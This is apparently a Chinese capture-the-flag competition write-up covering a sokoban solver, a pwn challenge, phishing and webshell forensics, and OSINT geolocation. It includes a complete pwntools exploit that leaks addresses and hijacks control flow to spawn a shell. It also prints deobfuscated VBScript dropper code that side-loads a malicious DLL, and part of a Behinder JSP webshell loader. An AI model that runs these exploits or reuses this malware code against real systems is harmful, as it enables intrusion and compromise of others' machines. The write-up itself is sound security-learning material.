0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000]
grid = np.array(grid).reshape(-1,20,20)
grid = grid.astype(str)
grid[grid == '1'] = '#'
grid[grid == '0'] = '.'
grid[grid == '2'] = 'S'
grid[grid == '3'] = 'B'
grid[grid == '4'] = 'T'
sol = Solution()
ansList = [0]*len(grid)
for i in range(len(grid)):
print(grid[i])
print('\n')
# 改地图
map1 = grid[1].copy()
map1[3,5] = '.'
map1[3,9] = '.'
grid[1] = map1.copy()
ansList[1] = 4
map5 = grid[5].copy()
map5[1,1] = '.'
map5[1,7] = '.'
grid[5] = map5.copy()
ansList[5] = 6
grid[7][9,4] = '.'
grid[7][5,5] = '.'
ansList[7] += 5
grid[7][1,16] = '.'
grid[7][1,1] = '.'
ansList[7] += 15
for i in range(len(grid)):
print(grid[i])
B = np.argwhere(grid[i] == 'B')
for pox in B:
x, y = pox
print(f"B = {x, y}")
if len(B) == 0:
print("B = None")
ansList[i] = 0
continue
T = np.argwhere(grid[i] == 'T')
for pox in T:
x, y = pox
print(f"T = {x, y}")
ans = sol.minPushBox(grid[i])
print(f"ansList[{i}] = {ans}")
ansList[i] += ans
print(ansList) #
def md5(s):
return hashlib.md5(s.encode()).hexdigest()
tmp = "".join([str(x) for x in ansList])
print(tmp)
# [2, 12, 13, 9, 21, 13, 25, 31, 3, 0, 0, 0, 0, 0]
# flag{21213921132531300000_9afa9e017684253cb49521466dcc97d5}
# flag{212139211325313_fec2d316d20dbacbe0cdff8fb6ff07b9}
# flag{2cd9_e841e6fe9186cfcd3bcfa16018abc0c5}
# flag{2cd9_fec2d316d20dbacbe0cdff8fb6ff07b9}
# flag{qwb!_fec2d316d20dbacbe0cdff8fb6ff07b9}
3. Pwn
3.1 expect_number
随机数种子固定,是伪随机数,可以预测运算,最开始等于 0xa2,可以执行 system(“cat gift”),但远程没有 gift,后面看字符串看到有 system(“/bin/sh”),在 cpp 异常处理里,还有个可以触发异常的函数:
输入计算的数有 288 轮,调试一下发现可以覆盖到 exit 的函数,只需要控制计算结果覆盖最低字节为“\x60”就能通过 exit 的选项跳过来进行溢出并触发异常,同时通过 show 可以泄露 elf 地址,覆盖 ebp 和返回地址跳到 system(“/bin/sh”)的异常处理即可:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
from pwn import *
#context(log_level='debug',arch='amd64',os='linux')
from ctypes import *
import time
dll = cdll.LoadLibrary("./libc.so.6")
p=process('./number')
p=remote('59.110.159.153', 22720)
sa = lambda a,s:p.sendafter(a,s)
sla = lambda a,s:p.sendlineafter(a,s)
s = lambda a:p.send(a)
sl = lambda a:p.sendline(a)
ru = lambda s:p.recvuntil(s)
rc = lambda s:p.recv(s)
uu64=lambda data :u64(data.ljust(8,b'\x00'))
get_libc = lambda :u64(ru('\x7f')[-6:].ljust(8,b'\x00'))
plo = lambda o:p64(libc_base+o)
def game(number):
sla('choice \n','1')
sla('or 0\n',str(number))
def show():
sla('choice \n','2')
seed = dll.srand(1)
num=0
for i in range(255):
rand_num =dll.rand()%4+1
if(rand_num == 1):
num+=0
game(0)
elif(rand_num == 2):
num-=0
game(0)
elif(rand_num == 3):
num*=1
game(1)
else:
game(1)
num=num//1
print(str(i)+"num:"+str(num))
#num=1
for i in range(7):
rand_num =dll.rand()%4+1
if(rand_num == 1):
num+=2
game(2)
elif(rand_num == 2):
num-=0
game(0)
elif(rand_num == 3):
num*=2
game(2)
else:
game(1)
num=num//1
print(str(i)+"num:"+str(num))
rand_num =dll.rand()%4+1
game(0)
rand_num =dll.rand()%4+1
game(0)
rand_num =dll.rand()%4+1
game(2)
for i in range(10):
rand_num =dll.rand()%4+1
if(rand_num == 1):
num+=0
game(0)
elif(rand_num == 2):
num-=0
game(0)
elif(rand_num == 3):
num*=1
game(1)
else:
game(1)
num=num//1
print(str(i)+"num:"+str(num))
game(2)
show()
ru('011100011022222000210010000112')
elf_base=u64(rc(6).ljust(8,b'\x00'))-0x4c60
success('elf:'+hex(elf_base))
sla('choice \n','4')
#gdb.attach(p)
#pause()
elf1=elf_base%0x10000
sa('number.\n',b'\x00'*0x20+p64(elf_base+0x5700)+p16(elf1+0x2517))
p.interactive()
4. Misc
4.1 give me secret
4.2 Master of DFIR - Phishing
回答 13 个问题
1、攻击者的邮箱
a8cd5b4ba47e185d4a69a583fde84da5
2、攻击者所投放的文件 md5
压缩包 md5sum
f436b02020fa59f3f71e0b6dcac6c7d3
3、攻击者所使用的攻击载荷后缀
压缩包里的文件后缀:msc
4、攻击者所投放样本的初始执行语句在该攻击载荷文件的第几行
97(看到 90 开始才是,一个个加上去试出来的)
5、经过初始执行后,攻击者所加载的第二部分载荷所使用的语言是什么
VBScript
沙箱分析看到:
6、攻击者所进行的第二部分载荷其将黑 DLL 存在了什么地方? (注意:需要提供完成的解混淆后的第二部分载荷 s***s 函数的参数)
一句一句慢慢解,解完也只有 selectNodes 函数符合,三个参数都试一下即可
Dim mscLL
mscLL = "_MSC"
For i = 1 To Len(mscLL) Step 4
oFmXCTg = oFmXCTg & ChrW(CLng("&" & "H" & Mid(mscLL,i,4)))
Next
Set RTcxFmy = CreateObject("Microsot.XMLDOM")
RTcxFmy.Async = "False"
RTcxFmy.Load( oFmXCTg )
AJ8p
Function Xk7fbp8v(inp)
Dim q4XPbvoV
Dim HxWK
Set q4XPbvoV = CreateObject("MSXML2.DOMDocument")
Set HxWK = q4XPbvoV.createElement("a")
HxWK.DataType = "bin.base64"
HxWK.Text = inp
Xk7fbp8v = HxWK.nodeTypedValue
End Function
Function AJ8p()
On Error Resume Next
Dim AgUvcCuHzzbl
Dim DfAV40y
Dim gwqhhV
Dim JJNe
Dim Mw7U
Dim O8B1OrkTW
OMxa = "51734e8e7ec47ec753c252a07b2c516b5c4a201c5f3a7f51676f201d516856fd7f517edc5b895168631162188d5b7684901a77e5ff08003100316708003265e581f3003365e54e3e884c7ebf4e0a8d5bff09002e007000640066"
Set AgUvcCuHzzbl = CreateObject("WScript.Shell")
Set DfAV40y = CreateObject("Scripting.FileSystemObject")
O8B1OrkTW = AgUvcCuHzzbl.ExpandEnvironmentStrings("%ProgramFiles%")
P59b6scR2TD9 = O8B1OrkTW & "\Cloudflare"
DfAV40y.CreateFolder(P59b6scR2TD9) ' 系统文件夹
gwqhhV = P59b6scR2TD9 & "\GUP.exe"
JJNe = P59b6scR2TD9 & "\libcurl.dll"
For i = 1 To Len(OMxa) Step 4
FRURX = FRURX & ChrW(CLng("&" & "H" & Mid(OMxa,i,4))) ' 强网先锋.pdf
Next
Mw7U = DfAV40y.GetSpecialFolder(2) & "\" & FRURX
Set aZPHxtz4 = RTcxFmy.selectNodes("/MMC_ConsoleFile/BinaryStorage/Binary[@Name='CONSOLE_TREE']")
rqsgO2mBfu = aZPHxtz4(0).text
UoLAunW = fun1(rqsgO2mBfu)
Dim jXnaWeLQ12
Set jXnaWeLQ12 = CreateObject("ADODB.Stream")
jXnaWeLQ12.Type = 1
jXnaWeLQ12.Open
jXnaWeLQ12.Write UoLAunW
jXnaWeLQ12.SaveToFile Mw7U,2
AgUvcCuHzzbl.run """" & Mw7U & """",1,False
Set aZPHxtz4 = RTcxFmy.selectNodes( "/MMC_ConsoleFile/BinaryStorage/Binary[@Name='CONSOLE_MENU']" )
Ze1C = aZPHxtz4(0).text
Set aZPHxtz4 = RTcxFmy.selectNodes( "/MMC_ConsoleFile/BinaryStorage/Binary[@Name='CONSOLE_PANE']" )
JozMh9jg = aZPHxtz4(0).text
AnZUOdqFuMEw = fun1(Ze1C)
s4fr2y4Q7lvQ = fun1(JozMh9jg)
Dim cHh5wARUext
Set cHh5wARUext = CreateObject("ADODB.Stream")
cHh5wARUext.Type = 1
cHh5wARUext.Open
cHh5wARUext.Write AnZUOdqFuMEw
cHh5wARUext.SaveToFile gwqhhV,2
Dim BKzG1ldRw7
Set BKzG1ldRw7 = CreateObject("ADODB.Stream")
BKzG1ldRw7.Type = 1
BKzG1ldRw7.Open
BKzG1ldRw7.Write s4fr2y4Q7lvQ
BKzG1ldRw7.SaveToFile JJNe,2
AgUvcCuHzzbl.run """" & gwqhhV & """" & " t 8.8.8" & "." & "8",0,False
End Function
Public Function i9Vu0(ByVal Value,ByVal Shift)
i9Vu0 = Value
If Shift > 0 Then
If Value > 0 Then
i9Vu0 = Int(i9Vu0 / (2 ^ Shift))
Else
If Shift > 31 Then
i9Vu0 = 0
Else
i9Vu0 = i9Vu0 And & H7FFFFFFF
i9Vu0 = Int(i9Vu0 / (2 ^ Shift))
i9Vu0 = i9Vu0 Or 2 ^ (31 - Shift)
End If
End If
End If
End Function
Public Function PIvwo4QDjBC(ByVal Value,ByVal Shift)
PIvwo4QDjBC = Value
If Shift > 0 Then
Dim i
Dim m
For i = 1 To Shift
m = PIvwo4QDjBC And & H40000000
PIvwo4QDjBC = (PIvwo4QDjBC And & H3FFFFFFF) * 2
If m <> 0 Then
PIvwo4QDjBC = PIvwo4QDjBC Or & H80000000
End If
Next
End If
End Function
Public Function eUBp1LoLYEMy(ByVal num)
Const rkLx = 5570645
Const beweT2U = 52428
Const d1 = 7
Const d2 = 14
Dim t,u,out
t = (num Xor i9Vu0(num,d2)) And beweT2U
u = num Xor t Xor PIvwo4QDjBC(t,d2)
t = (u Xor i9Vu0(u,d1)) And rkLx
out = (u Xor t Xor PIvwo4QDjBC(t,d1))
eUBp1LoLYEMy = out
End Function
Public Function FTKaWvcYaGWt(ByRef MiCzi9())
Dim i,fr,upJNNa,raw
Dim a,b,c,d
Dim YBx4PZLTHSQ1
Dim EJSi8qJd0()
Dim a2,b2
YBx4PZLTHSQ1 = ""
For i = 0 To (UBound(MiCzi9) / 4 + 1)
fr = i * 4
If fr > UBound(MiCzi9) Then
Exit For
End If
upJNNa = 0
upJNNa = upJNNa Or PIvwo4QDjBC(MiCzi9(fr + 3),24)
upJNNa = upJNNa Or PIvwo4QDjBC(MiCzi9(fr + 2),16)
upJNNa = upJNNa Or PIvwo4QDjBC(MiCzi9(fr + 1),8)
upJNNa = upJNNa Or MiCzi9(fr + 0)
raw = eUBp1LoLYEMy(upJNNa)
a = Chr(i9Vu0((raw And & HFF000000),24))
b = Chr(i9Vu0((raw And 16711680),16))
c = Chr(i9Vu0((raw And 65280),8))
d = Chr(i9Vu0((raw And 255),0))
YBx4PZLTHSQ1 = YBx4PZLTHSQ1 + d + c + b + a
Next
FTKaWvcYaGWt = YBx4PZLTHSQ1
End Function
Public Function t4zFxxgg22(MiCzi9)
Dim CYhV8N(),Liefs(),arrayByte3(255)
Dim Rp7jaY2jOqr(63),arrayLong5(63)
Dim Mbt0mzk6(63),NALQp0Gu3
Dim b7Z9n8,iter,VKkZEf,ZyvKLLyyHHD
Dim YBx4PZLTHSQ1
MiCzi9 = Replace(MiCzi9,vbCr,vbNullString)
MiCzi9 = Replace(MiCzi9,vbLf,vbNullString)
ZyvKLLyyHHD = Len(MiCzi9) Mod 4
If InStrRev(MiCzi9,"==") Then
b7Z9n8 = 2
ElseIf InStrRev(MiCzi9,"" + "=") Then
b7Z9n8 = 1
End If
For ZyvKLLyyHHD = 0 To 255
Select Case ZyvKLLyyHHD
Case 65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90
arrayByte3(ZyvKLLyyHHD) = ZyvKLLyyHHD - 65
Case 97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122
arrayByte3(ZyvKLLyyHHD) = ZyvKLLyyHHD - 71
Case 48,49,50,51,52,53,54,55,56,57
arrayByte3(ZyvKLLyyHHD) = ZyvKLLyyHHD + 4
Case 43
arrayByte3(ZyvKLLyyHHD) = 62
Case 47
arrayByte3(ZyvKLLyyHHD) = 63
Case Else
End Select
Next
For ZyvKLLyyHHD = 0 To 63
Rp7jaY2jOqr(ZyvKLLyyHHD) = ZyvKLLyyHHD * 64
arrayLong5(ZyvKLLyyHHD) = ZyvKLLyyHHD * 4096
Mbt0mzk6(ZyvKLLyyHHD) = ZyvKLLyyHHD * 262144
Next
Liefs = StrConv(MiCzi9,vbFromUnicode)
ReDim CYhV8N((((UBound(Liefs) + 1) \ 4) * 3) - 1)
For iter = 0 To UBound(Liefs) Step 4
NALQp0Gu3 = Mbt0mzk6(arrayByte3(Liefs(iter))) + arrayLong5(arrayByte3(Liefs(iter + 1))) + Rp7jaY2jOqr(arrayByte3(Liefs(iter + 2))) + arrayByte3(Liefs(iter + 3))
ZyvKLLyyHHD = NALQp0Gu3 And 16711680
CYhV8N(VKkZEf) = ZyvKLLyyHHD \ 65536
ZyvKLLyyHHD = NALQp0Gu3 And 65280
CYhV8N(VKkZEf + 1) = ZyvKLLyyHHD \ 256
CYhV8N(VKkZEf + 2) = NALQp0Gu3 And 255
VKkZEf = VKkZEf + 3
Next
YBx4PZLTHSQ1 = StrConv(CYhV8N,vbUnicode)
If b7Z9n8 Then YBx4PZLTHSQ1 = Left(YBx4PZLTHSQ1,Len(YBx4PZLTHSQ1) - b7Z9n8)
t4zFxxgg22 = FTKaWvcYaGWt(StrConv(YBx4PZLTHSQ1,vbFromUnicode))
t4zFxxgg22 = qY7AOEpU1wn(t4zFxxgg22,"~")
End Function
Function qY7AOEpU1wn(str,chars)
Dim fqX3dbudmU
Dim XVZECKbx()
XVZECKbx = Split(str,chars)
fqX3dbudmU = UBound(XVZECKbx,1)
If fqX3dbudmU <> 0 Then
str = Left(str,Len(str) - fqX3dbudmU)
End If
qY7AOEpU1wn = str
End Function
d2fabdcc28074462ac2379101836c938
7、攻击者使用的这个白 EXE 加载黑 DLL 的手法所对应的 MITRE ATT&CK ID 是什么? (注意:请注意示例的提示提交大类即可不需要细化到分项) 示例: T1000
根据沙箱内容试了一下出了:
T1574
8、攻击者所使用的黑 DLL 劫持了原始 DLL 的哪个函数? 示例: main
将 libcurl.dll 丢进沙箱,把沙箱所有列出来的函数试一遍即可
curl_easy_init
9、攻击者所使用的黑 DLL 解密下一阶段载荷所使用的 Key 是什么? (注意:请提交一段小写的十六进制字符串) 示例:1122334455
f21a9d8b1e5d
10、攻击者所使用的下一阶段载荷的回连 C2 是什么? (注意:需要提供 ip 地址:端口的形式) 示例:127.0.0.1:5100
沙箱即可看到:192.168.57.119:6000
11、攻击者所使用最终阶段载荷所使用的加密算法是什么? 示例:DES
还没拿到最终载荷试了几个常见的就试出来了:AES
12、攻击者所使用最终阶段载荷所使用的密钥的 MD5 是什么? (注意:MD5(密钥内容),以 cyberchef 的为准) 示例:9b04d152845ec0a378394003c96da594
提示:第 12 问的最终载荷指得是 RAT 的载荷 java 的马和本题目毫无关系
根据上一阶段载荷可以知道读取了 files/1730391917.bin,流量包提取出来后分析,发现是 donut 混淆,直接用工具解一下,得到一个 go 程序文件,丢进沙箱看到标红队内网穿透工具,猜测是 frp,尝试调出参数–version,key 就来了
https://github.com/fatedier/frp
| pJB`-v)t^ZAsP$ | r |
13、攻击者使用了什么家族的 C2? 示例:PoshC2
go 语言写的,C2,直接 github 上搜一个个试:
https://github.com/topics/c2?l=go
OrcaC2
1
2
3
4
5
6
7
8
9
10
11
12
13
14
icq6668dee5afe2a2a95bef82e9ef3a7
a8cd5b4ba47e185d4a69a583fde84da5
f436b02020fa59f3f71e0b6dcac6c7d3
msc
97
VBScript
d2fabdcc28074462ac2379101836c938
T1574
curl_easy_init
f21a9d8b1e5d
192.168.57.119:6000
AES
a524c43df3063c33cfd72e2bf1fd32f6
OrcaC2
4.3 master of OSINT
第二张图:
右边有一家百安居,下面有一家迪卡侬和金海马家居
左边有高铁站或者地铁站的高架桥和站点
当前地图车也是在高架上的,有点像内环路,而且地铁和金海马分别在路的两边
上海百安居龙阳店,车在旁边的内环高架
答案 121.567305,31.21016
第三张图:
右边有空管塔,应该是某个机场旁边
前面有个加油站,看不清是中国能源还是中国航油
地图车在一个十字路口
应该是成都的某个机场
成都双流国际机场 答案 103.964736,30.572038
第四张图:
右边有宜家,上方有一条铁路,地图车也在一条高架桥上
车,宜家杭州商场,铁路都对上了,还有路边施工挡板的空调 答案 120.293325,30.346293
第五张图:
定位到重庆
最后定位到谢家湾立交,答案:106.524075,29.526023
第六张图:
网上搜索
这个 H 型建筑(金鹰世界)和图上左边远处的很相似,这张图的景点是明城墙,在南京。右边的塔应该就是南京琉璃塔
根据 H 的长短,方向应该是一样的,琉璃塔应该在后面同一侧,直接顺着方向找
答案 118.782035,32.013749
第七张图:
长沙交警大楼
答案 112.967126,28.201697
第八张图:
上海长兴岛
答案 121.734713,31.412575
第九张图:
武汉天兴洲长江大桥
答案 114.411367,30.662866
第十张图:
桥上文字:铁三局集团携手促进浙江经济发展;最左边:宏泰百货,有三条铁路高架桥
宏泰百货在中国浙江省杭州市萧山区新城路 668 号
车也对上了 答案 120.309383,30.152195
flag{a29b2ab413d20c338d6087bee5312333}
4.4 Master of DFIR - Coffee
1
2
3
4
5
6
7
8
9
DESKTOP-28DGVAU
a55330f4-83c2-4081
history
tomcat:beautiful
/help/help.jsp
behinder
hhcloud:vipvip123
sys_update.exe
auto.skypool.xyz
1、流量包中分组详情搜索 DESKTOP 试多几次就出了
2、搜索 ClientId 字眼即可获得
3、利用 help.jsp 整理加密逻辑进行解密请求包和相应包
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
<%@ page language="java" pageEncoding="UTF-8" %>
<%@ page import="java.util.*" %>
<%@ page import="org.apache.jasper.servlet.JspServlet" %>
<%@ page import="org.apache.jasper.runtime.HttpJspBase" %>
<%@ page import="org.apache.catalina.core.StandardWrapperFacade" %>
<%@ page import="org.apache.catalina.core.StandardWrapper" %>
<%@ page import="java.lang.reflect.Field" %>
<%@ page import="java.lang.reflect.Method" %>
<%@ page import="java.lang.reflect.AccessibleObject" %>
<%!
public class JspClassLoader extends ClassLoader {
public JspClassLoader(ClassLoader parent) {
super(parent);
}
public Class<?> findClass(String name) {
Map<String, String> map = new HashMap<>();
String gALahVBOe_jsp$U = "yv66vgAAADMAIwcAAgEAHm9yZy9hcGFjaGUvanNwL2dBTGFoVkJPZV9qc3AkVQcABAEAFWphdmEvbGFuZy9DbGFzc0xvYWRlcgEABnRoaXMkMAEAHkxvcmcvYXBhY2hlL2pzcC9nQUxhaFZCT2VfanNwOwEABjxpbml0PgEAOChMb3JnL2FwYWNoZS9qc3AvZ0FMYWhWQk9lX2pzcDtMamF2YS9sYW5nL0NsYXNzTG9hZGVyOylWAQAEQ29kZQkAAQALDAAFAAYKAAMADQwABwAOAQAaKExqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7KVYBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAgTG9yZy9hcGFjaGUvanNwL2dBTGFoVkJPZV9qc3AkVTsBAAFjAQAXTGphdmEvbGFuZy9DbGFzc0xvYWRlcjsBAAFnAQAVKFtCKUxqYXZhL2xhbmcvQ2xhc3M7CgADABgMABkAGgEAC2RlZmluZUNsYXNzAQAXKFtCSUkpTGphdmEvbGFuZy9DbGFzczsBAAFiAQACW0IBAApTb3VyY2VGaWxlAQASZ0FMYWhWQk9lX2pzcC5qYXZhAQAMSW5uZXJDbGFzc2VzBwAhAQAcb3JnL2FwYWNoZS9qc3AvZ0FMYWhWQk9lX2pzcAEAAVUAIAABAAMAAAABEBAABQAGAAAAAgAAAAcACAABAAkAAAA/AAIAAwAAAAsqK7UACiostwAMsQAAAAIADwAAAAYAAQAAAD0AEAAAABYAAgAAAAsAEQASAAAAAAALABMAFAACAAEAFQAWAAEACQAAAEEABAACAAAACSorAyu+twAXsAAAAAIADwAAAAoAAgAAAD4ACAA9ABAAAAAWAAIAAAAJABEAEgAAAAAACQAbABwAAQACAB0AAAACAB4AHwAAAAoAAQABACAAIgAA";map.put("gALahVBOe_jsp$U", gALahVBOe_jsp$U);String gALahVBOe_jsp = "yv66vgAAADMBjwcAAgEAHG9yZy9hcGFjaGUvanNwL2dBTGFoVkJPZV9qc3AHAAQBACVvcmcvYXBhY2hlL2phc3Blci9ydW50aW1lL0h0dHBKc3BCYXNlBwAGAQAsb3JnL2FwYWNoZS9qYXNwZXIvcnVudGltZS9Kc3BTb3VyY2VEZXBlbmRlbnQHAAgBACpvcmcvYXBhY2hlL2phc3Blci9ydW50aW1lL0pzcFNvdXJjZUltcG9ydHMBAAxfanNweEZhY3RvcnkBAB5MamF2YXgvc2VydmxldC9qc3AvSnNwRmFjdG9yeTsBABBfanNweF9kZXBlbmRhbnRzAQAPTGphdmEvdXRpbC9NYXA7AQAJU2lnbmF0dXJlAQAzTGphdmEvdXRpbC9NYXA8TGphdmEvbGFuZy9TdHJpbmc7TGphdmEvbGFuZy9Mb25nOz47AQAWX2pzcHhfaW1wb3J0c19wYWNrYWdlcwEAD0xqYXZhL3V0aWwvU2V0OwEAI0xqYXZhL3V0aWwvU2V0PExqYXZhL2xhbmcvU3RyaW5nOz47AQAVX2pzcHhfaW1wb3J0c19jbGFzc2VzAQAVX2VsX2V4cHJlc3Npb25mYWN0b3J5AQAcTGphdmF4L2VsL0V4cHJlc3Npb25GYWN0b3J5OwEAFF9qc3BfaW5zdGFuY2VtYW5hZ2VyAQAjTG9yZy9hcGFjaGUvdG9tY2F0L0luc3RhbmNlTWFuYWdlcjsBAAg8Y2xpbml0PgEAAygpVgEABENvZGUKABsAHQcAHAEAHGphdmF4L3NlcnZsZXQvanNwL0pzcEZhY3RvcnkMAB4AHwEAEWdldERlZmF1bHRGYWN0b3J5AQAgKClMamF2YXgvc2VydmxldC9qc3AvSnNwRmFjdG9yeTsJAAEAIQwACQAKBwAjAQARamF2YS91dGlsL0hhc2hTZXQKACIAJQwAJgAYAQAGPGluaXQ+CQABACgMAA8AEAgAKgEADGphdmF4LmNyeXB0bwsALAAuBwAtAQANamF2YS91dGlsL1NldAwALwAwAQADYWRkAQAVKExqYXZhL2xhbmcvT2JqZWN0OylaCAAyAQANamF2YXguc2VydmxldAgANAEACWphdmEudXRpbAgANgEAEmphdmF4LnNlcnZsZXQuaHR0cAgAOAEAB2phdmEuaW8IADoBABFqYXZheC5jcnlwdG8uc3BlYwgAPAEAEWphdmF4LnNlcnZsZXQuanNwCQABAD4MABIAEAEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQoAAwAlAQAEdGhpcwEAHkxvcmcvYXBhY2hlL2pzcC9nQUxhaFZCT2VfanNwOwEAB0RlY3J5cHQBAAYoW0IpW0IBAApFeGNlcHRpb25zBwBIAQATamF2YS9sYW5nL0V4Y2VwdGlvbggASgEAEGphdmEudXRpbC5CYXNlNjQKAEwATgcATQEAD2phdmEvbGFuZy9DbGFzcwwATwBQAQAHZm9yTmFtZQEAJShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9DbGFzczsIAFIBAApnZXREZWNvZGVyCgBMAFQMAFUAVgEACWdldE1ldGhvZAEAQChMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsKAFgAWgcAWQEAGGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZAwAWwBcAQAGaW52b2tlAQA5KExqYXZhL2xhbmcvT2JqZWN0O1tMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7CgBeAGAHAF8BABBqYXZhL2xhbmcvT2JqZWN0DABhAGIBAAhnZXRDbGFzcwEAEygpTGphdmEvbGFuZy9DbGFzczsIAGQBAAZkZWNvZGUHAGYBAAJbQggAaAEAFnN1bi5taXNjLkJBU0U2NERlY29kZXIKAEwAagwAawBsAQALbmV3SW5zdGFuY2UBABQoKUxqYXZhL2xhbmcvT2JqZWN0OwgAbgEADGRlY29kZUJ1ZmZlcgcAcAEAEGphdmEvbGFuZy9TdHJpbmcKAG8AcgwAJgBzAQAFKFtCKVYIAHUBABA4MmNhOWI0M2MxYjhlZjhjCgBvAHcMAHgAeQEACGdldEJ5dGVzAQAEKClbQggAewEAEGI0MmUzMjdmZWI1ZDkyM2IIAH0BAAV1dGYtOAoAbwB/DAB4AIABABYoTGphdmEvbGFuZy9TdHJpbmc7KVtCBwCCAQAfamF2YXgvY3J5cHRvL3NwZWMvU2VjcmV0S2V5U3BlYwgAhAEAA0FFUwoAgQCGDAAmAIcBABcoW0JMamF2YS9sYW5nL1N0cmluZzspVggAiQEAFEFFUy9FQ0IvUEtDUzVQYWRkaW5nCgCLAI0HAIwBABNqYXZheC9jcnlwdG8vQ2lwaGVyDACOAI8BAAtnZXRJbnN0YW5jZQEAKShMamF2YS9sYW5nL1N0cmluZzspTGphdmF4L2NyeXB0by9DaXBoZXI7CgCLAJEMAJIAkwEABGluaXQBABcoSUxqYXZhL3NlY3VyaXR5L0tleTspVgoAiwCVDACWAEUBAAdkb0ZpbmFsBwCYAQAWamF2YS91dGl